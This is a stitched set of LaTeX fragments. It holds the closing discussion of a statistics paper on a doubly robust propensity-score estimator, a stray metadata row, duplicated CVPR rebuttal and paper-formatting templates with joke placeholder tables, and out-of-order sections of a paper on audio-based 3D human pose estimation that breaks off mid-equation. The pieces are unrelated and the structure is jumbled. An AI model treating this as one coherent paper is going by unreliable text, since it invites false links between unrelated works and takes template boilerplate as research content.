\section{Discussion} \label{s:discussion}
In this paper we developed a novel IPW-based approach to estimate the ATE that accommodates settings with high-dimensional covariates. Under sparsity assumptions and using appropriate regularization, the estimator achieves double-robustness and local semiparametric efficiency when adjusting for many covariates. By calibrating the initial PS through a smoothing, we showed that additional gains in robustness and efficiency are guaranteed in large samples under misspecification of working models. Simulation results demonstrate that DiPS exhibits comparative performance to existing approaches under correctly specified models but achieves potentially substantial gains in efficiency under model misspecification.
In numerical studies, we used the extended regularized information criterion \citep{hui2015tuning} to tune adaptive LASSO, which is shown to maintain selection consistency for the diverging $p$ case when $log(p)/log(n) = \nu$, for $\nu\in [0,1)$. Other criteria such as cross-validation can also be used and may exhibit better performance in some cases. To obtain a suitable bandwidth $h$, the bandwidth must be selected such that the dominating errors in the influence function, which are of order $O_p(n^{1/2}h^q + n^{-1/2}h^{-2})$, converges to $0$. This is satisfied for $h= O(n^{-\alpha})$ for $\alpha \in (\frac{1}{2q},\frac{1}{4})$. The optimal bandwidth $h^*$ is one that balances these bias and variance terms and is of order $h^*=O(n^{-1/(q+2)})$. In practice we use a plug-in estimator $\widehat{h}^* = \widehat{\sigma} n^{-1/(q+2)}$, where $\widehat{\sigma}$ is the sample standard deviation of either $\widehat{\balph}^{\sf \tiny T}\mathbf{X}_i$ or $\widehat{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}_i$, possibly after applying a monotonic transformation. Similarly, cross-validation can also be used to obtain an optimal bandwidth for smoothing itself and re-scaled to be of the optimal order.
The second estimated direction $\widehat{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}$ can be considered a working prognostic score \citep{hansen2008prognostic}. In the case where $\boldsymbol\beta_0=\boldsymbol\beta_1$ is postulated in the working outcome model \eqref{e:ormod} but, in actuality $\boldsymbol\beta_0\neq\boldsymbol\beta_1$, $\widehat{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}$ could be a mixture of the true prognostic and propensity scores and may not be ancillary for the ATE. This could bias estimates of ATE when adjusting only for $\widehat{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}$. DiPS avoids this source of bias by adjusting for both the working PS $\widehat{\balph}^{\sf \tiny T}\mathbf{X}$ and $\widehat{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}$ so that consistency is still maintained in this case, provided the working PS model \eqref{e:psmod} is correct (i.e. under $\mathcal{M}_{\pi} \cap \mathcal{M}_{\mu}^c$). Otherwise, if the PS model is also incorrect, no method is guaranteed to be consistent.
If adaptive LASSO is used to estimate $\boldsymbol\alpha$ and $\boldsymbol\beta_k$ and the true $\boldsymbol\alpha$ and $\boldsymbol\beta_k$ are of order $O(n^{-1/2})$, $\widehat{\balph}$ and $\widehat{\boldsymbol\beta}_k$ are not $n^{1/2}$-consistent when the penalty is tuned to achieve consistent model selection \citep{potscher2009distribution}. This is a limitation of relying on procedures that satisfy oracle properties only under fixed-parameter asymptotics. DiPS is thus preferred in situations where $n$ is large and signals are not extremely weak.
Moreover, if adaptive LASSO is used, when $\nu$ is large, a large power parameter $\gamma$ would be required to maintain the oracle properties, leading to an unstable penalty and potentially poor performance in finite samples.
It would be of interest to consider other approaches to estimate $\boldsymbol\alpha$ and $\boldsymbol\beta_k$ that have good performance in broader settings, such as settings allowing for larger $p$ and more general sparsity assumptions. It would also be of interest to extend the approach to accommodate survival data.
\backmatter
\bibliographystyle{biom}
| 2024-02-18T23:40:10.906Z | 2017-12-25T02:02:30.000Z | algebraic_stack_train_0000 | 1,553 | 9,899 |
|
proofpile-arXiv_065-7721 | \section{Introduction}
After receiving paper reviews, authors may optionally submit a rebuttal to address the reviewers' comments, which will be limited to a {\bf one page} PDF file. Please follow the steps and style guidelines outlined below for submitting your author response.
Note that the author rebuttal is optional and, following similar guidelines to previous CVPR conferences, it is meant to provide you with an opportunity to rebut factual errors or to supply additional information requested by the reviewers. It is NOT intended to add new contributions (theorems, algorithms, experiments) that were not included in the original submission. You may optionally add a figure, graph or proof to your rebuttal to better illustrate your answer to the reviewers' comments.
Per a passed 2018 PAMI-TC motion, reviewers should not request additional experiments for the rebuttal, or penalize authors for lack of additional experiments. This includes any experiments that involve running code, e.g., to create tables or figures with new results. \textbf{Authors should not include new experimental results in the rebuttal}, and reviewers should discount any such results when making their final recommendation. Authors may include figures with illustrations or comparison tables of results reported in the submission/supplemental material or in other papers.
The rebuttal must adhere to the same blind-submission as the original submission and must comply with this rebuttal-formatted template.
\subsection{Response length}
Author responses must be no longer than 1 page in length including any references and figures. Overlength responses will simply not be reviewed. This includes responses where the margins and formatting are deemed to have been significantly altered from those laid down by this style guide. Note that this \LaTeX\ guide already sets figure captions and references in a smaller font.
\section{Formatting your Response}
{\bf Make sure to update the paper title and paper ID in the appropriate place in the tex file.}
All text must be in a two-column format. The total allowable width of the text
area is $6\frac78$ inches (17.5 cm) wide by $8\frac78$ inches (22.54 cm) high.
Columns are to be $3\frac14$ inches (8.25 cm) wide, with a $\frac{5}{16}$ inch
(0.8 cm) space between them. The top margin should begin
1.0 inch (2.54 cm) from the top edge of the page. The bottom margin should be
1-1/8 inches (2.86 cm) from the bottom edge of the page for $8.5 \times
11$-inch paper; for A4 paper, approximately 1-5/8 inches (4.13 cm) from the
bottom edge of the page.
Please number all of your sections and any displayed equations. It is important
for readers to be able to refer to any particular equation.
Wherever Times is specified, Times Roman may also be used. Main text should be
in 10-point Times, single-spaced. Section headings should be in 10 or 12 point
Times. All paragraphs should be indented 1 pica (approx. 1/6 inch or 0.422
cm). Figure and table captions should be 9-point Roman type as in
Figure~\ref{fig:onecol}.
List and number all bibliographical references in 9-point Times, single-spaced,
at the end of your response. When referenced in the text, enclose the citation
number in square brackets, for example~\cite{Authors14}. Where appropriate,
include the name(s) of editors of referenced books.
\begin{figure}[t]
\begin{center}
\fbox{\rule{0pt}{1in} \rule{0.9\linewidth}{0pt}}
\end{center}
\caption{Example of caption. It is set in Roman so that mathematics
(always set in Roman: $B \sin A = A \sin B$) may be included without an
ugly clash.}
\label{fig:long}
\label{fig:onecol}
\end{figure}
\subsection{Illustrations, graphs, and photographs}
All graphics should be centered. Please ensure that any point you wish to make is resolvable in a printed copy of the response. Resize fonts in figures to match the font in the body text, and choose line widths which render effectively in print. Many readers (and reviewers), even of an electronic copy, will choose to print your response in order to read it. You cannot insist that they do otherwise, and therefore must not assume that they can zoom in to see tiny details on a graphic.
When placing figures in \LaTeX, it's almost always best to use \verb+\includegraphics+, and to specify the figure width as a multiple of the line width as in the example below
{\small\begin{verbatim}
\usepackage[dvips]{graphicx} ...
\includegraphics[width=0.8\linewidth]
{myfile.eps}
\end{verbatim}
}
{\small
\bibliographystyle{ieee_fullname}
\section{Introduction}
After receiving paper reviews, authors may optionally submit a rebuttal to address the reviewers' comments, which will be limited to a {\bf one page} PDF file.
Please follow the steps and style guidelines outlined below for submitting your author response.
The author rebuttal is optional and, following similar guidelines to previous CVPR conferences, is meant to provide you with an opportunity to rebut factual errors or to supply additional information requested by the reviewers.
It is NOT intended to add new contributions (theorems, algorithms, experiments) that were absent in the original submission and NOT specifically requested by the reviewers.
You may optionally add a figure, graph, or proof to your rebuttal to better illustrate your answer to the reviewers' comments.
Per a passed 2018 PAMI-TC motion, reviewers should refrain from requesting significant additional experiments for the rebuttal or penalize for lack of additional experiments.
Authors should refrain from including new experimental results in the rebuttal, especially when not specifically requested to do so by the reviewers.
Authors may include figures with illustrations or comparison tables of results reported in the submission/supplemental material or in other papers.
Just like the original submission, the rebuttal must maintain anonymity and cannot include external links that reveal the author identity or circumvent the length restriction.
The rebuttal must comply with this template (the use of sections is not required, though it is recommended to structure the rebuttal for ease of reading).
\subsection{Response length}
Author responses must be no longer than 1 page in length including any references and figures.
Overlength responses will simply not be reviewed.
This includes responses where the margins and formatting are deemed to have been significantly altered from those laid down by this style guide.
Note that this \LaTeX\ guide already sets figure captions and references in a smaller font.
\section{Formatting your Response}
{\bf Make sure to update the paper title and paper ID in the appropriate place in the tex file.}
All text must be in a two-column format.
The total allowable size of the text area is $6\frac78$ inches (17.46 cm) wide by $8\frac78$ inches (22.54 cm) high.
Columns are to be $3\frac14$ inches (8.25 cm) wide, with a $\frac{5}{16}$ inch (0.8 cm) space between them.
The top margin should begin 1 inch (2.54 cm) from the top edge of the page.
The bottom margin should be $1\frac{1}{8}$ inches (2.86 cm) from the bottom edge of the page for $8.5 \times 11$-inch paper;
for A4 paper, approximately $1\frac{5}{8}$ inches (4.13 cm) from the bottom edge of the page.
Please number any displayed equations.
It is important for readers to be able to refer to any particular equation.
Wherever Times is specified, Times Roman may also be used.
Main text should be in 10-point Times, single-spaced.
Section headings should be in 10 or 12 point Times.
All paragraphs should be indented 1 pica (approx.~$\frac{1}{6}$ inch or 0.422 cm).
Figure and table captions should be 9-point Roman type as in \cref{fig:onecol}.
List and number all bibliographical references in 9-point Times, single-spaced,
at the end of your response.
When referenced in the text, enclose the citation number in square brackets, for example~\cite{Alpher05}.
Where appropriate, include the name(s) of editors of referenced books.
\begin{figure}[t]
\centering
\fbox{\rule{0pt}{0.5in} \rule{0.9\linewidth}{0pt}}
\caption{Example of caption. It is set in Roman so that mathematics
(always set in Roman: $B \sin A = A \sin B$) may be included without an
ugly clash.}
\label{fig:onecol}
\end{figure}
To avoid ambiguities, it is best if the numbering for equations, figures, tables, and references in the author response does not overlap with that in the main paper (the reviewer may wonder if you talk about \cref{fig:onecol} in the author response or in the paper).
See \LaTeX\ template for a workaround.
\subsection{Illustrations, graphs, and photographs}
All graphics should be centered.
Please ensure that any point you wish to make is resolvable in a printed copy of the response.
Resize fonts in figures to match the font in the body text, and choose line widths which render effectively in print.
Readers (and reviewers), even of an electronic copy, may choose to print your response in order to read it.
You cannot insist that they do otherwise, and therefore must not assume that they can zoom in to see tiny details on a graphic.
When placing figures in \LaTeX, it is almost always best to use \verb+\includegraphics+, and to specify the figure width as a multiple of the line width as in the example below
{\small\begin{verbatim}
\usepackage{graphicx} ...
\includegraphics[width=0.8\linewidth]
{myfile.pdf}
\end{verbatim}
}
{\small
\bibliographystyle{ieee_fullname}
\section{Conclusion \label{sec:conc}}
This paper exploited the possibility of adding ultrasound audio as a new modality for metric scale 3D human pose estimation. By estimating a audio pose kernel, and encoding it to the physical space, we introduced a neural network pipeline that can accurately predict up to scale 3D human pose. We tested our algorithm on two unseen environments, and the results are promising, shading light towards potential application in smart home, AR/VR, human robot interaction, and beyond. We also proposed a new dataset DatasetName, calling for attentions from future researchers to this interesting audio-visual 3D pose estimation problem.
\section{Introduction}
Please follow the steps outlined below when submitting your manuscript to
the IEEE Computer Society Press. This style guide now has several
important modifications (for example, you are no longer warned against the
use of sticky tape to attach your artwork to the paper), so all authors
should read this new version.
\subsection{Language}
All manuscripts must be in English.
\subsection{Dual submission}
Please refer to the author guidelines on the 2022~web page for a
discussion of the policy on dual submissions.
\subsection{Paper length}
Papers, excluding the references section,
must be no longer than eight pages in length. The references section
will not be included in the page count, and there is no limit on the
length of the references section. For example, a paper of eight pages
with two pages of references would have a total length of 10 pages.
{\bf There will be no extra page charges for 2022.}
Overlength papers will simply not be reviewed. This includes papers
where the margins and formatting are deemed to have been significantly
altered from those laid down by this style guide. Note that this
\LaTeX\ guide already sets figure captions and references in a smaller font.
The reason such papers will not be reviewed is that there is no provision for
supervised revisions of manuscripts. The reviewing process cannot determine
the suitability of the paper for presentation in eight pages if it is
reviewed in eleven.
\subsection{The ruler}
The \LaTeX\ style defines a printed ruler which should be present in the
version submitted for review. The ruler is provided in order that
reviewers may comment on particular lines in the paper without
circumlocution. If you are preparing a document using a non-\LaTeX\
document preparation system, please arrange for an equivalent ruler to
appear on the final output pages. The presence or absence of the ruler
should not change the appearance of any other content on the page. The
camera ready copy should not contain a ruler.
(\LaTeX\ users may use options of cvpr.cls to switch between different
versions.)
Reviewers:
note that the ruler measurements do not align well with lines in the paper
--- this turns out to be very difficult to do well when the paper contains
many figures and equations, and, when done, looks ugly. Just use fractional
references (e.g.\ this line is $095.5$), although in most cases one would
expect that the approximate location will be adequate.
\subsection{Mathematics}
Please number all of your sections and displayed equations. It is
important for readers to be able to refer to any particular equation. Just
because you didn't refer to it in the text doesn't mean some future reader
might not need to refer to it. It is cumbersome to have to use
circumlocutions like ``the equation second from the top of page 3 column
1''. (Note that the ruler will not be present in the final copy, so is not
an alternative to equation numbers). All authors will benefit from reading
Mermin's description of how to write mathematics:
\url{http://www.pamitc.org/documents/mermin.pdf}.
\subsection{Blind review}
Many authors misunderstand the concept of anonymizing for blind
review. Blind review does not mean that one must remove
citations to one's own work---in fact it is often impossible to
review a paper unless the previous citations are known and
available.
Blind review means that you do not use the words ``my'' or ``our''
when citing previous work. That is all. (But see below for
techreports.)
Saying ``this builds on the work of Lucy Smith [1]'' does not say
that you are Lucy Smith; it says that you are building on her
work. If you are Smith and Jones, do not say ``as we show in
[7]'', say ``as Smith and Jones show in [7]'' and at the end of the
paper, include reference 7 as you would any other cited work.
An example of a bad paper just asking to be rejected:
\begin{quote}
\begin{center}
An analysis of the frobnicatable foo filter.
\end{center}
In this paper we present a performance analysis of our
previous paper [1], and show it to be inferior to all
previously known methods. Why the previous paper was
accepted without this analysis is beyond me.
[1] Removed for blind review
\end{quote}
An example of an acceptable paper:
\begin{quote}
\begin{center}
An analysis of the frobnicatable foo filter.
\end{center}
In this paper we present a performance analysis of the
paper of Smith \etal [1], and show it to be inferior to
all previously known methods. Why the previous paper
was accepted without this analysis is beyond me.
[1] Smith, L and Jones, C. ``The frobnicatable foo
filter, a fundamental contribution to human knowledge''.
Nature 381(12), 1-213.
\end{quote}
If you are making a submission to another conference at the same time,
which covers similar or overlapping material, you may need to refer to that
submission in order to explain the differences, just as you would if you
had previously published related work. In such cases, include the
anonymized parallel submission~\cite{Authors14} as additional material and
cite it as
\begin{quote}
[1] Authors. ``The frobnicatable foo filter'', F\&G 2014 Submission ID 324,
Supplied as additional material {\tt fg324.pdf}.
\end{quote}
Finally, you may feel you need to tell the reader that more details can be
found elsewhere, and refer them to a technical report. For conference
submissions, the paper must stand on its own, and not {\em require} the
reviewer to go to a techreport for further details. Thus, you may say in
the body of the paper ``further details may be found
in~\cite{Authors14b}''. Then submit the techreport as additional material.
Again, you may not assume the reviewers will read this material.
Sometimes your paper is about a problem which you tested using a tool which
is widely known to be restricted to a single institution. For example,
let's say it's 1969, you have solved a key problem on the Apollo lander,
and you believe that the CVPR70 audience would like to hear about your
solution. The work is a development of your celebrated 1968 paper entitled
``Zero-g frobnication: How being the only people in the world with access to
the Apollo lander source code makes us a wow at parties'', by Zeus \etal.
You can handle this paper like any other. Don't write ``We show how to
improve our previous work [Anonymous, 1968]. This time we tested the
algorithm on a lunar lander [name of lander removed for blind review]''.
That would be silly, and would immediately identify the authors. Instead
write the following:
\begin{quotation}
\noindent
We describe a system for zero-g frobnication. This
system is new because it handles the following cases:
A, B. Previous systems [Zeus et al. 1968] didn't
handle case B properly. Ours handles it by including
a foo term in the bar integral.
...
The proposed system was integrated with the Apollo
lunar lander, and went all the way to the moon, don't
you know. It displayed the following behaviours
which show how well we solved cases A and B: ...
\end{quotation}
As you can see, the above text follows standard scientific convention,
reads better than the first version, and does not explicitly name you as
the authors. A reviewer might think it likely that the new paper was
written by Zeus \etal, but cannot make any decision based on that guess.
He or she would have to be sure that no other authors could have been
contracted to solve problem B.
\medskip
\noindent
FAQ\medskip\\
{\bf Q:} Are acknowledgements OK?\\
{\bf A:} No. Leave them for the final copy.\medskip\\
{\bf Q:} How do I cite my results reported in open challenges?
{\bf A:} To conform with the double blind review policy, you can report results of other challenge participants together with your results in your paper. For your results, however, you should not identify yourself and should not mention your participation in the challenge. Instead present your results referring to the method proposed in your paper and draw conclusions based on the experimental comparison to other results.\medskip\\
\begin{figure}[t]
\begin{center}
\fbox{\rule{0pt}{2in} \rule{0.9\linewidth}{0pt}}
\end{center}
\caption{Example of caption. It is set in Roman so that mathematics
(always set in Roman: $B \sin A = A \sin B$) may be included without an
ugly clash.}
\label{fig:long}
\label{fig:onecol}
\end{figure}
\subsection{Miscellaneous}
\noindent
Compare the following:\\
\begin{tabular}{ll}
\verb'$conf_a$' & $conf_a$ \\
\verb'$\mathit{conf}_a$' & $\mathit{conf}_a$
\end{tabular}\\
See The \TeX book, p165.
The space after \eg, meaning ``for example'', should not be a
sentence-ending space. So \eg is correct, {\em e.g.} is not. The provided
\verb'\eg' macro takes care of this.
When citing a multi-author paper, you may save space by using ``et alia'',
shortened to ``\etal'' (not ``{\em et.\ al.}'' as ``{\em et}'' is a complete word.)
However, use it only when there are three or more authors. Thus, the
following is correct: ``
Frobnication has been trendy lately.
It was introduced by Alpher~\cite{Alpher02}, and subsequently developed by
Alpher and Fotheringham-Smythe~\cite{Alpher03}, and Alpher \etal~\cite{Alpher04}.''
This is incorrect: ``... subsequently developed by Alpher \etal~\cite{Alpher03} ...''
because reference~\cite{Alpher03} has just two authors. If you use the
\verb'\etal' macro provided, then you need not worry about double periods
when used at the end of a sentence as in Alpher \etal.
For this citation style, keep multiple citations in numerical (not
chronological) order, so prefer \cite{Alpher03,Alpher02,Authors14} to
\cite{Alpher02,Alpher03,Authors14}.
\begin{figure*}
\begin{center}
\fbox{\rule{0pt}{2in} \rule{.9\linewidth}{0pt}}
\end{center}
\caption{Example of a short caption, which should be centered.}
\label{fig:short}
\end{figure*}
\section{Formatting your paper}
All text must be in a two-column format. The total allowable width of the
text area is $6\frac78$ inches (17.5 cm) wide by $8\frac78$ inches (22.54
cm) high. Columns are to be $3\frac14$ inches (8.25 cm) wide, with a
$\frac{5}{16}$ inch (0.8 cm) space between them. The main title (on the
first page) should begin 1.0 inch (2.54 cm) from the top edge of the
page. The second and following pages should begin 1.0 inch (2.54 cm) from
the top edge. On all pages, the bottom margin should be 1-1/8 inches (2.86
cm) from the bottom edge of the page for $8.5 \times 11$-inch paper; for A4
paper, approximately 1-5/8 inches (4.13 cm) from the bottom edge of the
page.
\subsection{Margins and page numbering}
All printed material, including text, illustrations, and charts, must be kept
within a print area 6-7/8 inches (17.5 cm) wide by 8-7/8 inches (22.54 cm)
high.
Page numbers should be in footer with page numbers, centered and .75
inches from the bottom of the page and make it start at the correct page
number rather than the 4321 in the example. To do this fine the line (around
line 20)
\begin{verbatim}
\setcounter{page}{4321}
\end{verbatim}
where the number 4321 is your assigned starting page.
\subsection{Type-style and fonts}
Wherever Times is specified, Times Roman may also be used. If neither is
available on your word processor, please use the font closest in
appearance to Times to which you have access.
MAIN TITLE. Center the title 1-3/8 inches (3.49 cm) from the top edge of
the first page. The title should be in Times 14-point, boldface type.
Capitalize the first letter of nouns, pronouns, verbs, adjectives, and
adverbs; do not capitalize articles, coordinate conjunctions, or
prepositions (unless the title begins with such a word). Leave two blank
lines after the title.
AUTHOR NAME(s) and AFFILIATION(s) are to be centered beneath the title
and printed in Times 12-point, non-boldface type. This information is to
be followed by two blank lines.
The ABSTRACT and MAIN TEXT are to be in a two-column format.
MAIN TEXT. Type main text in 10-point Times, single-spaced. Do NOT use
double-spacing. All paragraphs should be indented 1 pica (approx. 1/6
inch or 0.422 cm). Make sure your text is fully justified---that is,
flush left and flush right. Please do not place any additional blank
lines between paragraphs.
Figure and table captions should be 9-point Roman type as in
Figures~\ref{fig:onecol} and~\ref{fig:short}. Short captions should be centred.
\noindent Callouts should be 9-point Helvetica, non-boldface type.
Initially capitalize only the first word of section titles and first-,
second-, and third-order headings.
FIRST-ORDER HEADINGS. (For example, {\large \bf 1. Introduction})
should be Times 12-point boldface, initially capitalized, flush left,
with one blank line before, and one blank line after.
SECOND-ORDER HEADINGS. (For example, { \bf 1.1. Database elements})
should be Times 11-point boldface, initially capitalized, flush left,
with one blank line before, and one after. If you require a third-order
heading (we discourage it), use 10-point Times, boldface, initially
capitalized, flush left, preceded by one blank line, followed by a period
and your text on the same line.
\subsection{Footnotes}
Please use footnotes\footnote {This is what a footnote looks like. It
often distracts the reader from the main flow of the argument.} sparingly.
Indeed, try to avoid footnotes altogether and include necessary peripheral
observations in
the text (within parentheses, if you prefer, as in this sentence). If you
wish to use a footnote, place it at the bottom of the column on the page on
which it is referenced. Use Times 8-point type, single-spaced.
\subsection{References}
List and number all bibliographical references in 9-point Times,
single-spaced, at the end of your paper. When referenced in the text,
enclose the citation number in square brackets, for
example~\cite{Authors14}. Where appropriate, include the name(s) of
editors of referenced books.
\begin{table}
\begin{center}
\begin{tabular}{|l|c|}
\hline
Method & Frobnability \\
\hline\hline
Theirs & Frumpy \\
Yours & Frobbly \\
Ours & Makes one's heart Frob\\
\hline
\end{tabular}
\end{center}
\caption{Results. Ours is better.}
\end{table}
\subsection{Illustrations, graphs, and photographs}
All graphics should be centered. Please ensure that any point you wish to
make is resolvable in a printed copy of the paper. Resize fonts in figures
to match the font in the body text, and choose line widths which render
effectively in print. Many readers (and reviewers), even of an electronic
copy, will choose to print your paper in order to read it. You cannot
insist that they do otherwise, and therefore must not assume that they can
zoom in to see tiny details on a graphic.
When placing figures in \LaTeX, it's almost always best to use
\verb+\includegraphics+, and to specify the figure width as a multiple of
the line width as in the example below
{\small\begin{verbatim}
\usepackage[dvips]{graphicx} ...
\includegraphics[width=0.8\linewidth]
{myfile.eps}
\end{verbatim}
}
\subsection{Color}
Please refer to the author guidelines on the 2022~web page for a discussion
of the use of color in your document.
\section{Final copy}
You must include your signed IEEE copyright release form when you submit
your finished paper. We MUST have this form before your paper can be
published in the proceedings.
Please direct any questions to the production editor in charge of these
proceedings at the IEEE Computer Society Press:
\url{https://www.computer.org/about/contact}.
{\small
\bibliographystyle{ieee_fullname}
\section{PoseKernel Dataset}
We collect a new dataset called \textit{PoseKernel} dataset. It is composed of more than 10,000 frames of synchronized videos and audios from six locations including living room, office, conference room, laboratory, etc. For each location, more than six participants were asked to perform as shown in Figure~\ref{fig:environments}. (We plan to release the dataset when paper publishes.)
\begin{figure}[t]
\centering
\includegraphics[width=\linewidth]{environments.PNG}
\caption{We collect our PoseKernel dataset in different environments with at least six participants per location, totalling more than 10,000 poses. }
\label{fig:environments}
\end{figure}
The cameras, speakers, and microphones are spatially calibrated using off-the-shelf structure-from-motion software such as COLMAP~\cite{schoenberger2016sfm} by scanning the environments with an additional camera and use the metric depth from the RGB-D cameras to estimate the true scale of the 3D reconstruction. We manually synchronize the videos and speakers by a distinctive audio signal, e.g., clapping, and the speakers and microphones are hardware synchronized by a field recorder (e.g., Zoom F8n Recorder) at a sample rate of 96 kHz.
For each scene, video data are captured by two RGB-D Azure Kinect cameras. These calibrated RGB-D cameras are used to estimate the ground truth 3D body pose using state-of-the-art pose estimation methods such as FrankMocap~\cite{rong2021frankmocap}. Multiple RGB-D videos are only used to generate the ground truth pose for training. In the testing phase, only a single RGB video is used.
Four speakers and four microphones are used to generate the audio signals. Each speaker generates a chirp audio signal sweeping frequencies between 19 kHz to 32 kHz. We use this frequency band because it is audible from consumer-grade microphones while inaudible for humans. Therefore, it does not interfere with human generated audio. In order to send multiple audio signals from four speakers, we use frequency-division multiplexing within the frequency band. Each chirp duration is 100 ms, resulting in 10 FPS reconstruction. At the beginning of every capture session, we capture the empty room impulse response for each microphone in the absence of humans.
We ask participants to perform a wide range of daily activities, e.g., sitting, standing, walking, and drinking, and range of motion in the environments. To evaluate the generalization on heights, in our test data, we include three minors (height between 140 cm and 150 cm) with consent from their guardians. All person identifiable information including faces are removed from the dataset.
\section{Introduction}
Since the projection of the 3D world onto an image loses scale information, 3D reconstruction of a human's pose from a single image is an ill-posed problem.
To address this limitation, human pose priors have been used in existing lifting approaches~\cite{tome,habibie,chang,pavlakos,yushuke,llopart,li21} to reconstruct the plausible 3D pose given the 2D detected pose by predicting relative depths. The resulting reconstruction, nonetheless, still lacks \textit{metric scale}, i.e., the metric scale cannot be recovered without making an additional assumption such as known height or ground plane contact.
This fundamental limitation of 3D pose lifting precludes applying it to realworld downstream tasks, e.g., smart home facilitation, robotics, and augmented reality, where the precise metric measurements of human activities are critical, in relation to the surrounding physical objects.
In this paper, we study a problem of metric human pose reconstruction from a single view image by incorporating a new sensing modality---audio signals from consumer-grade speakers (Figure~\ref{fig:teaser}). Our insight is that while traversing a 3D environment, the transmitted audio signals undergo a characteristic transformation induced by the geometry of reflective physical objects including human body. This transformation is subtle yet highly indicative of the body pose geometry, which can be used to reason about the metric scale reconstruction. For instance, the same music playing in a room sounds differently based on the presence or absence of a person, and more importantly, as the person moves.
We parametrize this transformation of audio signals using a time-invariant
transfer function called \textit{pose kernel}---an impulse response of audio induced by a body pose, i.e., the received audio signal is a temporal convolution of the transmitted signal with the pose kernel. Three key properties of pose kernel enables metric 3D pose lifting in a generalizable fashion: (1)~metric property: its impulse response is equivalent to the arrival time of the reflected audio, and therefore, it provides metric distance from the receiver (microphone); (2)~uniqueness: the envelope of pose kernel is strongly correlated with the location and pose of the target person; (3)~invariance: it is invariant to the geometry of surrounding environments, which allows us to generalize it to unseen environments.
While highly indicative of pose and location of the person in 3D, the pose kernel is a time-domain signal. Integrating it with the spatial-domain 2D pose detection is non-trivial. Further, generalization to new scenes requires precise 3D reasoning where existing audio-visual learning tasks such as source separation in an image domain and image representation learning~\cite{tian2021cyclic,ephrat:2018,gao:2019,owens2018audio} are not applicable.
We address this challenge in 3D reasoning of visual and audio signals, by learning to fuse the pose kernels from multiple microphones and the 2D pose detected from an image, using a 3D convolutional neural network (3D CNN): (1) we project each point in 3D onto the image to encode the likelihood of landmarks (visual features); and (2) we spatially encode the time-domain pose kernel in 3D to form audio features. Inspired by the convolutional pose machine architecture~\cite{wei2016cpm}, a multi-stage 3D CNN is designed to predict the 3D heatmaps of the joints given the visual and audio features. This multi-stage design increases effective receptive field with a small convolutional kernel (e.g., $3\times 3\times 3$) while addressing the issue of vanishing gradients.
In addition, we present a new dataset called \textit{PoseKernel} dataset. The dataset includes more than
10,000 poses from six locations with more than six participants per location,
performing diverse daily activities including sitting, drinking, walking, and jumping.
We use this dataset to evaluate the performance of our metric lifting method and show that it significantly outperforms state-of-the-art lifting approaches including mesh regression (e.g., FrankMocap~\cite{rong2021frankmocap}) and joint depth regression (e.g., Tome et al.~\cite{tome}). Due to the scale ambiguity of state-of-the-art approaches, the accuracy is dependent on the heights of target persons. In contrast, our approach can reliably recover the 3D poses regardless the heights, applicable to not only adults but also minors.
\noindent\textbf{Why Metric Scale?} Smart home technology is poised to enter our daily activities, in particular, for monitoring fragile populations including children, patients, and the elderly. This requires not only 3D pose reconstruction but also holistic 3D understanding in the context of metric scenes, which allows AI and autonomous agents to respond in a situation-aware manner. While multiview cameras can provide metric reconstruction, the number of required cameras to cover the space increases quadratically as area increases. Our novel multi-modal solution can mitigate this challenge by leveraging multi-source audios (often inaudible) generated by consumer grade speakers (e.g., Alexa).
\noindent\textbf{Contributions} This paper makes a major conceptual contribution that sheds a new light on a single view pose estimation by incorporating with audio signals. The technical contributions include (1) a new formulation of the pose kernel that is a function of the body pose and location, which can be generalized to a new scene geometry, (2) the spatial encoding of pose kernel that facilitates fusing visual and audio features, (3) a multi-stage 3D CNN architecture that can effectively fuse them together, and (4) a strong performance of our method, outperforming state-of-the-art lifting approaches with meaningful margin.
\section{Summary and Discussion} \label{sec:discussion}
This paper presented a new method to reconstruct 3D human body pose with the metric scale from a single image by leveraging audio signals. We hypothesized that the audio signals that traverse a 3D space are transformed by the human body pose through reflection, which allows us to recover the 3D metric scale pose. In order to prove this hypothesis, we use a human impulse response called pose kernel that can be spatially encoded in 3D. With the spatial encoding of the pose kernel, we learned a 3D convolutional neural network that can fuse the 2D pose detection from an image with the pose kernels to reconstruct 3D metric scale pose. We showed that our method is highly generalizable, agnostic to the room geometry, spatial arrangement of camera and speakers/microphones, and audio source signals.
The main assumption of the pose kernel is that the room is large enough to minimize its shadow effect: in theory, there exist room impulse responses that can be canceled by the pose because the human body can occlude the room impulse response behind the person. This shadow effect is a function of room geometry, and therefore, it is dependent on the spatial arrangement of camera and speakers. In practice, we use a room, or open space larger than 5 m$\times$5 m where the impact of shadow can be neglected.
\section{Method}
We make use of audio signals as a new modality for metric human pose estimation.
We learn a pose kernel that transforms audio signals, which can be encoded in 3D in conjunction with visual pose prediction as shown in Figure~\ref{fig:pose_kernel}.
\subsection{Pose Kernel Lifting}
We cast the problem of 3D pose lifting as learning a function $g_{\boldsymbol{\theta}}$ that predicts a set of 3D heatmaps $\{\mathbf{P}_i\}_{i=1}^N$ given an input image $\mathbf{I} \in [0,1]^{W\times H \times 3}$ where
$\mathbf{P}_i: \mathds{R}^3\rightarrow [0,1]$ is the likelihood of the $i^{\rm th}$ landmark over a 3D space, $W$ and $H$ are the width and height of the image, respectively, and $N$ is the number of landmarks. In other words,
\begin{align}
\{\mathbf{P}_i\}_{i=1}^N = g_{\boldsymbol{\theta}} (\mathbf{I}), \label{Eq:pose}
\end{align}
where $g_{\boldsymbol{\theta}}$ a learnable function parametrized by its weights $\boldsymbol{\theta}$ that lift a 2D image to the 3D pose. Given the predicted 3D heatmaps, the optimal 3D pose is given by $\mathbf{X}^*_i = \underset{\mathbf{X}}{\operatorname{argmax}}~\mathbf{P}_i(\mathbf{X})$ so that $\mathbf{X}^*_i$ is the optimal location of the $i^{\rm th}$ landmark. In practice, we use a regular voxel grid to represent $\mathbf{P}$.
We extend Equation~(\ref{Eq:pose}) by leveraging audio signals to reconstruct a metric scale human pose, i.e.,
\begin{align}
\{\mathbf{P}_i\}_{i=1}^N = g_{\boldsymbol{\theta}} (\mathbf{I}, \{k_j(t)\}_{j=1}^M), \label{Eq:time}
\end{align}
